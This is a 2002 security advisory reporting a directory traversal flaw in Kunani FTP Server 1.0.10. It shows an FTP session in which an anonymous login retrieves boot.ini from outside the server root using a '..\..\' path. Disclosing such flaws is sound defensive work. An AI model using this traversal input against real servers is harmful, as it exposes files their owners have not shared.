Kunani FTP Server Vulnerable to a Directory Traversal Attack
12 Dec. 2002
Summary
Kunani FTP Server is a free Windows based FTP Server, the product has been found to contain a security vulnerability that allows remote attackers to view files and directories outside the bounding FTP directory.
Vulnerable systems:
* Kunani FTP Server version 1.0.10
Example: ######################################################
Verbindung mit server.
220 Kunani FTP Server Ready ( www.kunani.com )
Benutzer (server:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> get ..\..\..\..\..\boot.ini
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
#####################################################